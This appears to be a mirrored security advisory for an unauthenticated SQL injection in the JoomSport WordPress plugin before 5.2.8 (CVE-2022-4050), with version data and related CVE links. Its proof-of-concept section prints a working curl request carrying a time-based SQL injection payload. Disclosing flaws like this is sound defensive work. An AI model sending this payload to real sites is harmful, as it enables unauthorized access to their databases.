Lucene search
CydaveWPVDB-ID:5C96BB40-4C2D-4E91-8339-E0DDCE25912FHistoryNov 28, 2022 - 12:00 a.m.
JoomSport < 5.2.8 - Unauthenticated SQLi
2022-11-2800:00:00
cydave
wpscan.com
7
joomsport plugin
sql injection
unauthenticated users
security vulnerability
sqli exploit
parameter sanitization
0.071 Low
EPSS
Percentile
94.0%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
PoC
1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted 2. Invoke the following curl command to induce a 10 second sleep: time curl ‘https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load’ \ --data ‘mdId=1&shattr;={“id”:“1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -”}’
| CPE | Name | Operator | Version |
|---|---|---|---|
| joomsport-sports-league-results-management | lt | 5.2.8 |
Related
cve
cve
CVE-2022-4050
2022-12-19 14:15:11
nvd
nvd
CVE-2022-4050
2022-12-19 14:15:11
prion
prion
Sql injection
2022-12-19 14:15:00
cvelist
cvelist
CVE-2022-4050 JoomSport < 5.2.8 - Unauthenticated SQLi
2022-12-19 13:41:51
nuclei
nuclei
WordPress JoomSport <5.2.8 - SQL Injection
2022-12-13 14:22:56
wpexploit
wpexploit
JoomSport < 5.2.8 - Unauthenticated SQLi
2022-11-28 00:00:00